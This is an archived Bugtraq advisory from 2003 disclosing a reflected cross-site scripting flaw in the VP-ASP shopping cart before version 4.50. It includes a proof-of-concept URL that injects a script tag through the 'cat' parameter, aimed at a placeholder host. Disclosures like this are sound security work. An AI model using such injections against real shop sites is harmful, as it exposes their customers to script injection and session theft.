Bugtraq mailing list archives
Cross Site Scripting in VP-ASP
From: Xnuxer Research Laboratory <xnuxer () linux net>
Date: Fri, 5 Dec 2003 04:19:28 -0800 (PST)
Advisory Name: Cross Site Scripting in VP-ASP Release Date: December 05st, 2003 Application: VP-ASP Version Affected: < 4.50 Platform: ASP Severity: Low Discover: Xnuxer Research Lab. (xnuxer () linux net, xnuxer () yahoo com) Vendor URL: http://www.vp-asp.com Reference: http://infosekuriti.com Proof Of Concept: http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code] Exploit Example: http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> _____________________________________________________________ Linux.Net -->Open Source to everyone Powered by Linare Corporation http://www.linare.com/
Current thread:
- Cross Site Scripting in VP-ASP Xnuxer Research Laboratory (Dec 05)